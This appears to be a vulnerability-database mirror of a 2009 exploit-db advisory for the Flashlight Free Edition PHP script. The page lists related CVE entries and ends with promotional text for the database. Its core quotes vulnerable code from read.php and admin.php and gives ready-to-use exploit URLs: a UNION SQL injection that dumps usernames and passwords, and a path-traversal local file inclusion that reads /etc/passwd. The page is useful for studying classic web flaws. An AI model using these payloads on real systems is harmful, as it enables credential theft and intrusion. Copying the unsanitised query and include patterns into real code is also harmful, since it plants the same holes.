Lucene search
+L

flashlight free edition - Local File Inclusion / SQL Injection

🗓️ 02 Jun 2009 00:00:00Reported by K4m1k451Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Flashlight Free Edition - LFI/SQL Injection in read.php and admin.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4204
2 Jun 200900:00
circl
circl
Circl
CVE-2009-4205
2 Jun 200900:00
circl
cve
CVE
CVE-2009-4204
4 Dec 200919:00
cve
cve
CVE
CVE-2009-4205
4 Dec 200919:00
cve
cvelist
Cvelist
CVE-2009-4204
4 Dec 200919:00
cvelist
cvelist
Cvelist
CVE-2009-4205
4 Dec 200919:00
cvelist
euvd
EUVD
EUVD-2009-4174
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-4175
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4204
4 Dec 200919:30
nvd
nvd
NVD
CVE-2009-4205
4 Dec 200919:30
nvd
Rows per page
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

RATM: "All hell can't stop us now!"

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451

--[E-mail : [email protected]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script   : Flashlight

--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Remote SQLi

--[File     : read.php


--[Vul      :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");

--[Exploit  :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Local File Inclusion

--[File     : admin.php
--[Vul      :

$inc = $_GET['action'];
include ("admin/".$inc.".php");

--[Exploit  :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

# milw0rm.com [2009-06-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation